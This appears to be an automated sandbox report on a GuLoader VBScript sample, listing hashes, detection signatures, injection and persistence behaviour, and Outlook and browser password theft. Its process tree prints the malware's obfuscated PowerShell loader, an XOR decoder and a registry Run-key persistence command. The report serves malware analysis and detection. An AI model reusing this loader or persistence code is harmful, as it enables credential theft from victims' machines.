Analysis
-
max time kernel
299s -
max time network
303s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system -
submitted
16-01-2023 10:23
Static task
static1
Behavioral task
behavioral1
Sample
prof.vbs
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
prof.vbs
Resource
win7-20220812-en
General
-
Target
prof.vbs
-
Size
193KB
-
MD5
7b458417e456edfb8816b9f063dd7f4a
-
SHA1
c42d1ff212085b0bd1a150b1e4e0cca2d7cf0dfb
-
SHA256
097eb0cafefed7ddcab95345b850b7f8fa2ba518068275225d9b6a313e1f3491
-
SHA512
da58b88ee2a7af27061808331f9fd2d14bf8cb6cc94099f7b7effecfd376e7d6a577d475ac04b0c4ce38417a8110daa9d7e63851da1223d343b4c6701e51782b
-
SSDEEP
6144:9vsgtPU635A3VxHwQA4hCLx4kjjrPEZp95g+Z/TugoVD9EwM8YmhCXo+v9kaRKZv:B9v35ElxXhCLxdPP8/6
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource | yara_rule
behavioral2/memory/1460-97-0x0000000000400000-0x0000000000457000-memory.dmp | MailPassView
behavioral2/memory/1460-98-0x0000000000400000-0x0000000000457000-memory.dmp | MailPassView
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource | yara_rule
behavioral2/memory/680-95-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView
-
Nirsoft 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/760-94-0x0000000000400000-0x0000000000424000-memory.dmp | Nirsoft
behavioral2/memory/680-95-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
behavioral2/memory/1460-97-0x0000000000400000-0x0000000000457000-memory.dmp | Nirsoft
behavioral2/memory/1460-98-0x0000000000400000-0x0000000000457000-memory.dmp | Nirsoft
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.exe, ieinstal.exe
description | ioc | process
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | ieinstal.exe
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
ieinstal.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | ieinstal.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
ieinstal.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run | ieinstal.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ungkarlelejlighedernes = "%SaltoQ% -w 1 $Projektgtr=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Fagintegreret;%SaltoQ% ($Projektgtr)" | ieinstal.exe
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
ieinstal.exe
pid | process
1480 | ieinstal.exe
1480 | ieinstal.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exe, ieinstal.exe
pid | process
1136 | powershell.exe
1480 | ieinstal.exe
-
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exe, ieinstal.exe
description | pid | process | target process
PID 1136 set thread context of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1480 set thread context of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 set thread context of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 set thread context of 760 | 1480 | ieinstal.exe | ieinstal.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe, powershell.exe, ieinstal.exe
pid | process
948 | powershell.exe
1136 | powershell.exe
680 | ieinstal.exe
680 | ieinstal.exe
-
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exe, ieinstal.exe
pid | process
1136 | powershell.exe
1480 | ieinstal.exe
1480 | ieinstal.exe
1480 | ieinstal.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exe, powershell.exe, ieinstal.exe
description | pid | process
Token: SeDebugPrivilege | 948 | powershell.exe
Token: SeDebugPrivilege | 1136 | powershell.exe
Token: SeDebugPrivilege | 760 | ieinstal.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
ieinstal.exe
pid | process
1480 | ieinstal.exe
-
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
WScript.exe, powershell.exe, powershell.exe, ieinstal.exe
description | pid | process | target process
PID 900 wrote to memory of 948 | 900 | WScript.exe | powershell.exe
PID 900 wrote to memory of 948 | 900 | WScript.exe | powershell.exe
PID 900 wrote to memory of 948 | 900 | WScript.exe | powershell.exe
PID 948 wrote to memory of 1136 | 948 | powershell.exe | powershell.exe
PID 948 wrote to memory of 1136 | 948 | powershell.exe | powershell.exe
PID 948 wrote to memory of 1136 | 948 | powershell.exe | powershell.exe
PID 948 wrote to memory of 1136 | 948 | powershell.exe | powershell.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1136 wrote to memory of 1480 | 1136 | powershell.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 680 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 1460 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
PID 1480 wrote to memory of 760 | 1480 | ieinstal.exe | ieinstal.exe
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\prof.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sye = """[obfuscated payload string removed]""";Function Craniom9 { param([String]$Vsmc89); For($Erhvervsgrupper=3; $Erhvervsgrupper -lt $Vsmc89.Length-1; $Erhvervsgrupper+=(3+1)){ $Sanikels = $Sanikels + $Vsmc89.Substring($Erhvervsgrupper, 1); } $Sanikels;}$Vexers0 = Craniom9 'BroIAppEPosXOps ';$Vexers1= Craniom9 $Sye;$Vexers1=$Vexers1.replace('<','$');$Vexers1=$Vexers1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Vexers1 ;}else{ & ($Vexers0) $Vexers1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Vsmc89); $Caprylyl = New-Object byte[] ($Vsmc89.Length / 2); For($Erhvervsgrupper=0; $Erhvervsgrupper -lt $Vsmc89.Length; $Erhvervsgrupper+=2){ $Caprylyl[$Erhvervsgrupper/2] = [convert]::ToByte($Vsmc89.Substring($Erhvervsgrupper, 2), 16); $Caprylyl[$Erhvervsgrupper/2] = ($Caprylyl[$Erhvervsgrupper/2] -bxor 69); } [String][System.Text.Encoding]::ASCII.GetString($Caprylyl);}…$Craniom=(Get-ItemProperty -Path 'HKCU:\Brugerudgave\Studenterhuernes85').Journalism;…#"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Program Files (x86)\internet explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Program Files (x86)\internet explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmhdwncwsnuhffqtwbtkprw"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:680 -
C:\Program Files (x86)\internet explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gomvxgmqgvmmplmxnmolawrsuq"5⤵
- Accesses Microsoft Outlook accounts
PID:1460 -
C:\Program Files (x86)\internet explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\iiroxyxsudersrabwwafdjlbvxgio"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:760
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\vmhdwncwsnuhffqtwbtkprw
Filesize
2B
MD5
f3b25701fe362ec84616a93a45ce9998
SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84